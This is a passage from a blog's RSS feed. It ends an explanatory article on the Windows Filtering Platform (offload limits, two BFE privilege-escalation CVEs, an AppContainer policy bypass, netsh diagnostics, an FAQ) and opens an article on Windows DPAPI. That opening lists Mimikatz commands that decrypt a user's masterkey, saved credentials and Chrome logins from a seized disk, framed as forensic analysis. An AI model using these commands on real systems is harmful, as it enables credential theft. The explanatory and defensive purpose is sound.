&lt;p&gt;The &quot;logically contiguous buffer&quot; is the problem. A WFP callout written against the pre-URO semantics (&quot;one indication at &lt;code&gt;FWPM_LAYER_DATAGRAM_DATA_V4&lt;/code&gt; is one UDP datagram&quot;) is silently wrong on a system where the NIC has coalesced several datagrams into one Network Buffer List. The callout that needs per-datagram inspection has to read &lt;code&gt;NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO&lt;/code&gt; to learn the per-flow size and unfold the indication accordingly [@uro]. The mechanical bound is that work the NIC has aggregated has lost its per-packet boundary by the time the kernel sees it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A callout at &lt;code&gt;FWPM_LAYER_DATAGRAM_DATA_V4&lt;/code&gt; or &lt;code&gt;_V6&lt;/code&gt; that assumes &quot;one NBL = one datagram&quot; is silently wrong on Windows 11 24H2 systems with URO-capable NICs. Read the per-flow size from &lt;code&gt;NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO&lt;/code&gt; and iterate. The change is documented in the URO reference page [@uro], but legacy callouts written before NDIS 6.89 will need an explicit audit.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The same shape repeats for TCP segmentation offload (TSO, LSO), receive offload (LRO, GRO), and TLS / IPsec / RDMA / VxLAN / GENEVE offload. Each one moves work to hardware. Each one weakens the kernel-filter assumption that &quot;every packet flows past every layer.&quot;&lt;/p&gt;
&lt;h3&gt;The kernel attack surface&lt;/h3&gt;
&lt;p&gt;The third ceiling is the one that drives the CVE cadence. Every callout is a kernel module [@wfp-callouts]. Every byte that crosses the &lt;code&gt;Fwpm*&lt;/code&gt; user-to-kernel boundary is a potential primitive for an elevation-of-privilege exploit [@nvd-2023-29368][@nvd-2024-38034]. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free in the WFP code path with a CVSS base of 7.0 (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.0, and an impact sub-score of 5.9 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow in the same family of code paths with a CVSS base of 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.8, and an impact sub-score of 5.9 [@nvd-2024-38034].&lt;/p&gt;
&lt;p&gt;The CVSS vector difference is worth reading carefully.The 2024 vulnerability&apos;s attack-complexity dropped from &lt;code&gt;AC:H&lt;/code&gt; to &lt;code&gt;AC:L&lt;/code&gt;. The exploitability sub-score rose from 1.0 to 1.8 over the same window. The 2024 bug is easier to weaponise [@nvd-2023-29368][@nvd-2024-38034]. Without speculating about the trend across a longer time series, the direction of travel between these two anchor CVEs is &quot;down, not up.&quot;&lt;/p&gt;
&lt;p&gt;There is a structural variant of the same story that does not require any memory-safety bug at all. In August 2021, Forshaw published a Project Zero post titled &quot;Understanding Network Access in Windows AppContainers.&quot; The post documents a default-WFP-policy configuration that allows certain low-privilege AppContainer processes to reach the network without any of the capability SIDs (&lt;code&gt;internetClient&lt;/code&gt;, &lt;code&gt;internetClientServer&lt;/code&gt;, &lt;code&gt;privateNetworkClientServer&lt;/code&gt;) that the AppContainer documentation suggests are required [@forshaw-2021]. The associated Project Zero issue, 2207, was marked WontFix by Microsoft; the press coverage at SecurityAffairs reproduces the advisory body verbatim: &quot;The default rules for the WFP connect layers permit certain executables to connect TCP sockets in AppContainers without capabilities leading to elevation of privilege... Eventually an AC process will match the &apos;Block Outbound Default Rule&apos; rule if nothing else has which will block any connection attempt&quot; [@securityaffairs-2021]. The bug is a policy composition bug, not a code bug. It exists in the way the in-box sublayers, filter weights, and default rules interact -- which is precisely the surface this article spent Section 5 explaining.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; WFP&apos;s hardest limits are not engineering choices Microsoft can rewrite. They are information-theoretic (a kernel filter without session keys cannot read what is encrypted), mechanical (hardware offloads exist to amortise work the kernel filter would have done, and aggregation destroys per-packet ground truth), and structural (every callout is a kernel module, and every &lt;code&gt;Fwpm*&lt;/code&gt; call crosses a user-to-kernel ABI). The BFE elevation-of-privilege CVE class is the running cost of a platform sophisticated enough to host every downstream feature Windows ships.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Three ceilings. Is there a structural fix for any of them, or is this what the platform looks like forever?&lt;/p&gt;
&lt;h2&gt;9. Open Problems -- Where the Engineering Lives&lt;/h2&gt;
&lt;p&gt;Six questions are live right now. None of them has a clean answer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;QUIC inspection in the kernel.&lt;/strong&gt; The current best partial result is to block QUIC by 5-tuple and rely on a browser&apos;s HTTP/3 fallback to TLS over TCP, where in-box inspection still works. The Defender for Endpoint Network Protection page documents the workaround verbatim: &quot;Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers&quot; [@mde-netprot]. Anything deeper than 5-tuple inspection on QUIC requires a user-mode proxy that terminates the QUIC connection and re-originates it, which moves the problem out of WFP.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Defender for Endpoint&apos;s exact WFP-layer registration map.&lt;/strong&gt; Publicly undocumented. Microsoft has published the capability and the limitations [@mde-netprot] but not the precise set of &lt;code&gt;FWPM_LAYER_*&lt;/code&gt; GUIDs that Network Protection registers callouts at. Community reverse engineering knows fragments. A definitive map would let third-party EDR vendors avoid sublayer-priority conflicts with Defender. Whether Microsoft publishes one is a product-roadmap question.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The structural shape of the BFE EoP CVE class.&lt;/strong&gt; Is the BFE elevation-of-privilege CVE class -- CWE-415 in 2023 [@nvd-2023-29368], CWE-190 in 2024 [@nvd-2024-38034], no public impossibility theorem either way -- tail risk inherent to the platform&apos;s policy-from-user-mode-to-kernel design, or is it addressable by an architectural fix (&lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt; hardening on &lt;code&gt;fwpkclnt.sys&lt;/code&gt; callout paths, bounded ABI contracts on the &lt;code&gt;Fwpm*&lt;/code&gt; surface, Rust-in-Windows-kernel for new callout drivers)? The honest answer is that this is open. The integer-overflow / use-after-free class is the canonical attack surface of any user-to-kernel ABI; the question is whether Microsoft commits to a structural fix or to tail-risk-mitigation-plus-patching.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;eBPF for Windows production readiness.&lt;/strong&gt; Does it displace WFP for new kernel-mode network filters, or does it stay adjacent? The v1.1.0 release in March 2026 was framed as &quot;first stable&quot; while still labelled Pre-release [@ebpf-releases]. The same release added hard/soft permit verdicts to its accept and bind hooks, explicitly mirroring &lt;code&gt;FWPS_RIGHT_ACTION_WRITE&lt;/code&gt; in WFP [@ebpf-releases]. That borrowing is a tell -- the project is converging on the WFP arbitration semantics, which suggests the long-term picture is &quot;eBPF for Windows alongside WFP&quot; rather than &quot;eBPF replaces WFP.&quot; The market answer is unsettled.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Windows Defender Application Guard&apos;s egress-isolation pattern after WDAG deprecation.&lt;/strong&gt; WDAG for Edge used a WFP-backed egress-isolation pattern to route browsing-container traffic out of an isolated network compartment. The WDAG product surface is being phased out -- Microsoft has documented that &quot;Microsoft Defender Application Guard... is deprecated for Microsoft Edge for Business and will no longer be updated. Starting with Windows 11, version 24H2, Microsoft Defender Application Guard... is no longer available&quot; [@mdag-deprecation]. The pattern&apos;s future on Windows -- in containers, virtualization-based security profiles, or some successor -- is undocumented as of the time of writing. Treat this paragraph as conjectural until Microsoft publishes a successor pattern.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NIC offload composability with kernel firewalls.&lt;/strong&gt; As more pipeline elements move into the NIC -- TSO, LSO, GRO/GSO, URO [@uro], TLS offload, IPsec offload, RDMA, VxLAN, GENEVE -- the assumption that every packet flows past every WFP layer weakens. A callout that registers at &lt;code&gt;FWPM_LAYER_INBOUND_TRANSPORT_V4&lt;/code&gt; may never see a packet whose transport-layer work happened entirely on the NIC. The kernel-firewall design that grew up assuming software ground truth has to renegotiate that assumption release by release. NDIS 6.89&apos;s URO is the most recent example [@ndis-689]; there will be more.&lt;/p&gt;

&quot;Open&quot; in this section means engineering-open, not theory-open. There is no published impossibility theorem stating that WFP cannot be made provably safe against integer-overflow elevation-of-privilege, or that a kernel firewall cannot inspect encrypted traffic with a key-disclosure protocol, or that NIC offloads cannot be composed with kernel-side filters by sharing flow state. The practical question, in every case, is whether Microsoft and the broader Windows community invest in the structural fix or settle for tail-risk-mitigation plus patching. The answer in 2026 is &quot;mostly the latter.&quot;
&lt;p&gt;Six open problems. Now, how do you actually use the platform that has been the subject of this article?&lt;/p&gt;
&lt;h2&gt;10. The Four Ways You Touch WFP&lt;/h2&gt;
&lt;p&gt;Whether you are an administrator, a detection engineer, or a kernel driver writer, there are four canonical surfaces you actually touch. Here is the field guide.&lt;/p&gt;
&lt;h3&gt;The diagnostic surface: &lt;code&gt;netsh wfp&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Wikipedia&apos;s WFP page notes the introduction date: &quot;Starting with Windows 7, the netsh command can diagnose of the internal state of WFP&quot; [@wiki-wfp]. The canonical incident-response triplet is three commands long.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Run these three commands, in this order, before doing anything else when a Windows host shows network-filtering behaviour you cannot explain: &lt;code&gt;text netsh wfp show state    &amp;gt; state.xml netsh wfp show filters  &amp;gt; filters.xml netsh wfp capture start file=C:\Temp\wfp.cab :: reproduce the issue netsh wfp capture stop &lt;/code&gt; &lt;code&gt;state.xml&lt;/code&gt; is the platform&apos;s current rendered configuration: every provider, sublayer, filter, and callout currently registered. &lt;code&gt;filters.xml&lt;/code&gt; lists every filter, including effective weight and action. The &lt;code&gt;.cab&lt;/code&gt; from &lt;code&gt;netsh wfp capture&lt;/code&gt; is the ETW-and-state bundle that goes onto a Microsoft Support case. The &lt;code&gt;netsh wfp&lt;/code&gt; family has been around since Windows 7 [@wiki-wfp]; it has not had a major redesign since.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A &lt;code&gt;state.xml&lt;/code&gt; from &lt;code&gt;netsh wfp show state&lt;/code&gt; is an XML document with one &lt;code&gt;&amp;lt;item&amp;gt;&lt;/code&gt; per filter. Each item carries a &lt;code&gt;&amp;lt;displayData&amp;gt;&lt;/code&gt; element with a name and description, the layer GUID, the sublayer GUID, the weight, and the action. Reading one is a matter of pattern recognition rather than parsing. The next snippet walks the structure on a hand-pasted fragment.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt; // A real-world &apos;netsh wfp show state&apos; output contains many &amp;lt;item&amp;gt; elements // inside &amp;lt;filters&amp;gt;. The fragment below is a single filter, hand-pasted from // a &apos;show state&apos; XML dump. const xmlFragment = \&lt;/code&gt;

  {deadbeef-1111-2222-3333-444455556666}
  
    EDR-vendor outbound TCP inspect
    Vendor X deep-inspection callout filter
  
  FWPM_LAYER_ALE_AUTH_CONNECT_V4
  {a0192d10-aaaa-bbbb-cccc-1234567890ab}
  
    FWP_UINT64
    0x4000000000000064
  
  
    FWP_ACTION_CALLOUT_INSPECTION
  

`;&lt;/p&gt;
&lt;p&gt;function readFilter(xml) {
  const get = (tag) =&amp;gt; {
    const m = xml.match(new RegExp(&apos;&amp;lt;&apos; + tag + &apos;&amp;gt;([^&amp;lt;]+)&amp;lt;/&apos; + tag + &apos;&amp;gt;&apos;));
    return m ? m[1].trim() : null;
  };
  return {
    name:    get(&apos;name&apos;),
    layer:   get(&apos;layerKey&apos;),
    subLayer:get(&apos;subLayerKey&apos;),
    weight:  get(&apos;uint64&apos;),
    action:  get(&apos;type&apos;),
  };
}&lt;/p&gt;
&lt;p&gt;console.log(readFilter(xmlFragment));
// {
//   name: &apos;EDR-vendor outbound TCP inspect&apos;,
//   layer: &apos;FWPM_LAYER_ALE_AUTH_CONNECT_V4&apos;,
//   subLayer: &apos;{a0192d10-aaaa-bbbb-cccc-1234567890ab}&apos;,
//   weight: &apos;0x4000000000000064&apos;,
//   action: &apos;FWP_ACTION_CALLOUT_INSPECTION&apos;
// }
`}&lt;/p&gt;
&lt;p&gt;Five fields: name, layer, sublayer, weight, action. That is what every WFP filter resolves to. Reading a hundred of them takes an afternoon.&lt;/p&gt;
&lt;h3&gt;The administrative surface: &lt;code&gt;wf.msc&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The Microsoft Management Console snap-in is the surface most Windows users have actually clicked. Every rule created in &lt;code&gt;wf.msc&lt;/code&gt; is translated by the &lt;code&gt;MpsSvc&lt;/code&gt; service into a WFP filter and pushed into the BFE&apos;s MPSSVC provider sublayer over RPC, and from there into &lt;code&gt;TCPIP.SYS&lt;/code&gt; in the kernel [@forshaw-2021]. The UI exposes a small fraction of the filter properties WFP actually models; advanced rule attributes (per-AppContainer SID, per-package family name, per-service hardening) live in the underlying filter only.&lt;/p&gt;
&lt;h3&gt;The networking surface: &lt;code&gt;New-NetNat&lt;/code&gt; and Hyper-V NAT switches&lt;/h3&gt;
&lt;p&gt;The PowerShell cmdlet &lt;code&gt;New-NetNat&lt;/code&gt; &quot;creates a Network Address Translation (NAT) object that translates an internal network address to an external network address&quot; [@netnat]. Each NAT object materialises as a set of WFP filters that perform the translation. Windows containers use the same machinery for their default NAT switch. The &lt;code&gt;Get-NetNat&lt;/code&gt;, &lt;code&gt;Remove-NetNat&lt;/code&gt;, and related cmdlets in the &lt;code&gt;NetNat&lt;/code&gt; PowerShell module are the entry point.&lt;/p&gt;
&lt;h3&gt;The driver surface: writing a WFP callout&lt;/h3&gt;
&lt;p&gt;The WDK&apos;s &quot;Introduction to Windows Filtering Platform Callout Drivers&quot; page is the entry point for kernel-mode writers [@wfp-callouts]. The reference sample, &lt;code&gt;WFPSampler&lt;/code&gt;, lives in the &lt;code&gt;microsoft/Windows-driver-samples&lt;/code&gt; repository under &lt;code&gt;network/trans/WFPSampler&lt;/code&gt;. The sample&apos;s description: &quot;The WFPSampler sample driver is a sample firewall. It has a command-line interface which allows adding filters at various WFP layers with a wide variety of conditions. Additionally it exposes callout functions for injection, basic action, proxying, and stream inspection&quot; [@wfpsampler]. The sample ships five components: &lt;code&gt;WFPSampler.Exe&lt;/code&gt;, &lt;code&gt;WFPSamplerService.Exe&lt;/code&gt;, &lt;code&gt;WFPSamplerCalloutDriver.Sys&lt;/code&gt;, &lt;code&gt;WFPSamplerProxyService.Exe&lt;/code&gt;, and the two libraries &lt;code&gt;WFPSampler.Lib&lt;/code&gt; / &lt;code&gt;WFPSamplerSys.Lib&lt;/code&gt;.If you install WFPSampler and the installer refuses to register without a reboot prompt, the README documents a workaround: run &lt;code&gt;RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 131 wfpsampler.inf&lt;/code&gt; (note the &lt;code&gt;131&lt;/code&gt;), and &lt;code&gt;RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 132 wfpsampler.inf&lt;/code&gt; for the corresponding uninstall codepath [@wfpsampler]. The 131/132 flags suppress the reboot prompt for the in-tree sample driver.&lt;/p&gt;
&lt;p&gt;A WFP callout driver that originates kernel-mode network I/O should pair with Winsock Kernel.&lt;/p&gt;

&quot;Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)&quot; [@wsk-intro]. WSK is the modern replacement for TDI as the kernel-mode sockets API on Windows Vista and later. Microsoft&apos;s WSK introduction makes the split explicit: &quot;Filter drivers should implement the Windows Filtering Platform on Windows Vista, and TDI clients should implement WSK&quot; [@wsk-intro]. WFP filters traffic. WSK opens sockets from inside the kernel. The two interfaces are siblings.

Before writing a callout driver, ask: does the policy need per-packet kernel visibility, or would a user-mode service that consumes ETW events from `Microsoft-Windows-WFP` and the firewall&apos;s ETW providers be enough? Most logging and detection use cases are answered by ETW. A callout driver is justified when you need to *act on* traffic (drop, redirect, modify, inspect payload), not just *observe* it. The kernel attack surface that comes with a callout, documented in Section 8, is now yours to share once you ship.
&lt;p&gt;The detection-engineering surface lives in &lt;a href=&quot;https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/&quot; rel=&quot;noopener&quot;&gt;ETW&lt;/a&gt;. The two providers to know are &lt;code&gt;Microsoft-Windows-WFP&lt;/code&gt; and &lt;code&gt;Microsoft-Windows-Windows Firewall With Advanced Security&lt;/code&gt;. Names are not enough to do the full subject justice; the cross-reference footer below points at the dedicated ETW article in this series.&lt;/p&gt;
&lt;p&gt;You now have a mental map of every place WFP touches a Windows host -- under the firewall UI, under IPsec, under WinNAT, under the Hyper-V vSwitch, under Defender for Endpoint, under every EDR. The FAQ disarms the last eight misconceptions.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. WFP is the platform; the Windows Firewall (WFAS, service name `MpsSvc`) is one consumer of it. Microsoft&apos;s start page makes the relationship explicit: &quot;Windows Firewall with Advanced Security (WFAS) is implemented using WFP&quot; [@wfp-start]. The Base Filtering Engine service (`bfe`) hosts the user-mode side of WFP and accepts policy from `MpsSvc` over RPC [@forshaw-2021]. Two user-mode services and a kernel-mode classification path, one platform.

No. `fwpkclnt.sys` is the kernel-mode WFP client and export driver. Callout drivers link against `fwpkclnt.lib`, whose in-memory form is `fwpkclnt.sys` [@wfp-arch]. The classification path -- the code that walks sublayers and filters -- runs primarily inside `NETIO.SYS`, as Forshaw documents in his Project Zero post [@forshaw-2021]. The shorthand &quot;`fwpkclnt.sys` is the filter engine&quot; is common online and incorrect.

No. BFE (service name `bfe`) is the Base Filtering Engine -- the platform service that controls WFP and plumbs configuration to other modules, including IPsec keying [@wfp-about]. `MpsSvc` is the Windows Defender Firewall service. `MpsSvc` depends on `bfe`; the dependency is not reciprocal [@forshaw-2021].

No. WFP callouts see plaintext only for non-IPsec, non-TLS payloads, or for IPsec traffic where the kernel holds the keys. TLS 1.3 and QUIC are end-to-end encrypted from a callout&apos;s perspective; the keys live in user-mode TLS libraries inside the application. Microsoft&apos;s own Defender for Endpoint Network Protection documentation acknowledges the limit: &quot;Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers&quot; [@mde-netprot]. Section 8 calls this the encryption ceiling.

No. SecureNAT is an ISA Server / Forefront Threat Management Gateway concept, retired with TMG. The modern Windows-host NAT on WFP is **WinNAT**, managed by the `New-NetNat` PowerShell cmdlet [@netnat]. Windows containers use WinNAT for their default NAT switch. The original input scope that informed this article erroneously referenced &quot;SecureNAT&quot; as a WFP consumer; the focus-premise audit corrected it to WinNAT before drafting began.

No. WSK is **Winsock Kernel**. Microsoft Learn&apos;s introduction is unambiguous: &quot;Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)&quot; [@wsk-intro]. The two-letter prefix is &quot;Winsock,&quot; the original Windows Sockets API brand, not &quot;Windows Sockets.&quot;

No. CVE-2024-21318 is a Microsoft SharePoint Server deserialization remote code execution vulnerability, unrelated to the Base Filtering Engine. The 2024 WFP elevation-of-privilege vulnerability is **CVE-2024-38034**: a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The article&apos;s source-verification stage flagged the original scope&apos;s CVE attribution error before drafting; the article tracks CVE-2024-38034 and CVE-2023-29368 as the two anchor BFE CVEs.

Only at the 5-tuple level (IP, port, protocol) before or after a connection establishes. Once a QUIC connection is up, the encryption ceiling applies and the kernel has no key for the encrypted payload [@mde-netprot]. FQDN-level blocking of QUIC over Network Protection requires QUIC to be disabled in the browser, per Microsoft&apos;s own troubleshooting guide [@mde-netprot]. Deep inspection of QUIC content from the kernel is not possible with WFP alone.
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;See also.&lt;/strong&gt; The Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall ETW providers are how detection-engineering teams see WFP from outside the kernel; the dedicated ETW article in this series goes deeper on the provider names, manifests, and parsing. The &lt;a href=&quot;https://paragmali.com/blog/amsi-the-pre-execution-window-defender/&quot; rel=&quot;noopener&quot;&gt;Antimalware Scan Interface (AMSI)&lt;/a&gt; sits on the process-side path that complements WFP&apos;s network-side path; the two are siblings, not substitutes. And the &lt;code&gt;\Device\Ipfilterdriver&lt;/code&gt; device object that this article retired in Section 3 lives in the Windows &lt;a href=&quot;https://paragmali.com/blog/the-object-manager-namespace/&quot; rel=&quot;noopener&quot;&gt;Object Manager namespace&lt;/a&gt;, whose architecture is the subject of the Object Manager article in this series.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-filtering-platform-the-kernel-mode-firewall-you-dont-see&quot; keyTerms={[
  { term: &quot;Windows Filtering Platform (WFP)&quot;, definition: &quot;Cross-mode kernel/user-mode filtering service introduced in Windows Vista that replaced NDIS-IM, filter-hook, TDI-filter, and Winsock LSP as the in-box network filtering surface.&quot; },
  { term: &quot;Base Filtering Engine (BFE)&quot;, definition: &quot;The Windows service (bfe) that controls WFP and plumbs configuration to other modules. Not the same as MpsSvc.&quot; },
  { term: &quot;Filter Engine&quot;, definition: &quot;The core WFP component that stores filters and performs filter arbitration. Hosted in both kernel mode and user mode; kernel classification runs primarily in NETIO.SYS.&quot; },
  { term: &quot;Shim&quot;, definition: &quot;Kernel-mode bridge between a network-stack module and the filter engine. Vista shipped six: ALE, Transport Layer Module, Network Layer Module, ICMP Error, Discard, Stream.&quot; },
  { term: &quot;Application Layer Enforcement (ALE)&quot;, definition: &quot;Set of WFP layers used for stateful filtering and the only layers where filters can match on application identity (normalized file name) and user identity (security descriptor).&quot; },
  { term: &quot;Sublayer&quot;, definition: &quot;Priority-ordered subdivision of a WFP filtering layer. Vendors are expected to create their own sublayer via FwpmSubLayerAdd0.&quot; },
  { term: &quot;Filter Weight&quot;, definition: &quot;64-bit value ordering filter evaluation within a sublayer. May be set as an explicit FWP_UINT64, generated by BFE (FWP_EMPTY), or partitioned into one of 16 high-order ranges via FWP_UINT8.&quot; },
  { term: &quot;Callout Driver&quot;, definition: &quot;Kernel driver registered with the filter engine that performs deep inspection, packet modification, stream modification, or data logging when a filter selects it.&quot; },
  { term: &quot;fwpkclnt.sys&quot;, definition: &quot;Kernel-mode WFP client / export driver. Callouts link against fwpkclnt.lib; the in-memory module is fwpkclnt.sys. Not the filter engine.&quot; },
  { term: &quot;Winsock Kernel (WSK)&quot;, definition: &quot;Kernel-mode sockets NPI introduced in Vista. WFP filters traffic; WSK opens sockets from inside the kernel. Replaces TDI for kernel-mode socket clients.&quot; },
  { term: &quot;NDIS Lightweight Filter (LWF)&quot;, definition: &quot;L2 filter driver introduced in NDIS 6.0 to replace NDIS 5.x intermediate drivers. Sees Ethernet frames before IP processing; no application identity.&quot; }
]} questions={[
  { q: &quot;Why did the four pre-WFP hooks (NDIS-IM, filter-hook, TDI-filter, LSP) fail collectively?&quot;, a: &quot;Each hook had a specific architectural flaw -- one callback pointer with no documented chaining for filter-hook, no application identity for NDIS-IM, a deprecated substrate for TDI, in-process bypass for LSP. Together those flaws made multi-vendor coexistence impossible, which the Pawar/Stenson 2006 WinHEC deck pinned at 12 percent of all OS crashes.&quot; },
  { q: &quot;What is the difference between BFE and MpsSvc?&quot;, a: &quot;BFE is the Base Filtering Engine (the WFP platform service). MpsSvc is the Windows Defender Firewall service (one consumer of the platform). MpsSvc depends on BFE; the dependency is one-way.&quot; },
  { q: &quot;How does WFP arbitrate two filters at the same layer with the same priority?&quot;, a: &quot;Filters live inside sublayers. Sublayers are priority-ordered; filters within a sublayer are weight-ordered. Hard Block and Hard Permit are terminal; Soft Block and Soft Permit can be overridden by a later evaluator; Block overrides Permit when nothing else terminates evaluation.&quot; },
  { q: &quot;Why can a WFP callout not block QUIC by hostname?&quot;, a: &quot;QUIC encrypts almost all of its control plane from the first byte using a key derived from the connection&apos;s initial secret. The kernel has no access to that key; the keys live in the application&apos;s user-mode QUIC stack. WFP can block QUIC only at the 5-tuple level. FQDN blocking requires QUIC and Encrypted Client Hello to be disabled in the browser, per Microsoft&apos;s own Network Protection documentation.&quot; },
  { q: &quot;What is the structural reason BFE keeps producing elevation-of-privilege CVEs?&quot;, a: &quot;Every callout is a kernel module and every Fwpm* call crosses a user-to-kernel ABI. The integer-overflow / use-after-free attack surface is intrinsic to that boundary. CVE-2023-29368 (CWE-415, CVSS 7.0) and CVE-2024-38034 (CWE-190, CVSS 7.8) are the two anchor CVEs of the class; the 2024 vulnerability is rated easier to weaponise than the 2023 one.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>windows-filtering-platform</category><category>kernel</category><category>firewall</category><category>network-security</category><category>ipsec</category><category>edr</category><category>wfp</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>DPAPI and DPAPI-NG: The Credential Vault Under Everything</title><link>https://paragmali.com/blog/dpapi-and-dpapi-ng-the-credential-vault-under-everything/</link><guid isPermaLink="true">https://paragmali.com/blog/dpapi-and-dpapi-ng-the-credential-vault-under-everything/</guid><description>A 25-year tour of Windows Data Protection API: the four-stage classic chain, the 2012 DPAPI-NG redesign, the KDS root key, and the five structural ceilings the design cannot close.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Classic DPAPI (Windows 2000, February 17, 2000 [@wikipedia-windows2000]) wraps every per-user Windows secret -- browser cookies, WiFi keys, EFS file keys, Outlook passwords, Credential Manager entries -- in a four-stage chain rooted at the user&apos;s password.** DPAPI-NG (Windows 8 / Server 2012) [@wikipedia-winserver2012] replaces the (user, machine) decryption boundary with a protection descriptor [@ms-protection-descriptors] and rides the Microsoft Key Distribution Service [@ms-gmsa-overview] to give every domain controller in the forest the same per-(group, period) key without inter-DC sync. Group Managed Service Accounts, delegated Managed Service Accounts [@ms-dmsa-overview], Windows Hello for Business on TPM-less devices, and Credential Guard&apos;s isolated-secret persistence all sit on top. The 2022-2025 Golden gMSA [@semperis-golden-gmsa], Golden dMSA [@semperis-golden-dmsa], and Chromium app-bound encryption [@thn-app-bound] disclosures all admit the same thing: DPAPI&apos;s structural ceilings (user-context binding, single-password derivation, KDS-root-key irrotability, hibernation, domain-backup-key concentration) are the design, not bugs.
&lt;h2&gt;1. A Thumb Drive, a Profile Directory, and Three Mimikatz Commands&lt;/h2&gt;
&lt;p&gt;A DFIR analyst slides a stolen laptop&apos;s drive into a write-blocker. The volume mounts because BitLocker&apos;s recovery key was already in the corporate KMS. Six files in &lt;code&gt;C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-...&lt;/code&gt; -- five GUIDs and a &lt;code&gt;Preferred&lt;/code&gt; pointer -- are the only thing standing between the analyst and a decade of Alice&apos;s saved Windows secrets.&lt;/p&gt;
&lt;p&gt;Three Mimikatz [@mimikatz-dpapi-wiki] commands later (&lt;code&gt;dpapi::masterkey /in:&amp;amp;lt;GUID&amp;amp;gt; /sid:S-1-5-21-... /password:&amp;lt;known&amp;gt;&lt;/code&gt;, then &lt;code&gt;dpapi::cred /in:&amp;lt;credfile&amp;gt; /masterkey:&amp;lt;unwrapped&amp;gt;&lt;/code&gt;, then &lt;code&gt;dpapi::chrome /in:&quot;Login Data&quot;&lt;/code&gt;) the analyst has Alice&apos;s saved RDP password to the production jump host, her Microsoft 365 session cookie, the home WiFi PSK, the KeePass &quot;Windows User Account&quot; master password, and the EFS keys for her protected documents (each item is itemised with primary citations in §5&apos;s eleven-row credential-vault inventory). No kernel exploit. No live login. Just one (account-password, SID) pair recovered offline from last week&apos;s NTDS.dit backup.&lt;/p&gt;
&lt;p&gt;The trick that makes that scene possible is older than most working engineers. It shipped in Windows 2000 GA on February 17, 2000 [@wikipedia-windows2000], it has been the same shape for 25 years, and its single-secret design assumption has been public and tractable since February 3, 2010 [@bursztein-talk-page]. The trick has a name: the &lt;strong&gt;Data Protection API&lt;/strong&gt;, or DPAPI.&lt;/p&gt;
&lt;p&gt;This article walks the API end-to-end at the level of detail an academic survey would, but with the working-engineer&apos;s framing the topic deserves. We open the four-stage classic-DPAPI chain at the SHA-1-of-NT-hash-into-PBKDF2-with-the-SID-as-UTF-16LE-salt level. We open the 2012 DPAPI-NG redesign [@ms-cng-dpapi] and the Microsoft Key Distribution Service&apos;s L0/L1/L2 derivation chain [@ms-gkdi-landing] at the same level of precision.&lt;/p&gt;
&lt;p&gt;We name the four production consumers that ride the new chain in 2026: gMSAs, dMSAs, Windows Hello for Business [@ms-whfb-howitworks] software-KSP credentials, and Credential Guard [@paragmali-com-the-en]&apos;s isolated-secret persistence. We name the five structural ceilings the 2022 Golden gMSA [@semperis-golden-gmsa], 2024 Chromium app-bound encryption [@google-security-blog-app-bound], and 2025 Golden dMSA [@semperis-golden-dmsa] disclosures all admit out loud. And we close with what a 2026 practitioner -- developer, defender, red-teamer, platform engineer -- actually does with all of it.&lt;/p&gt;
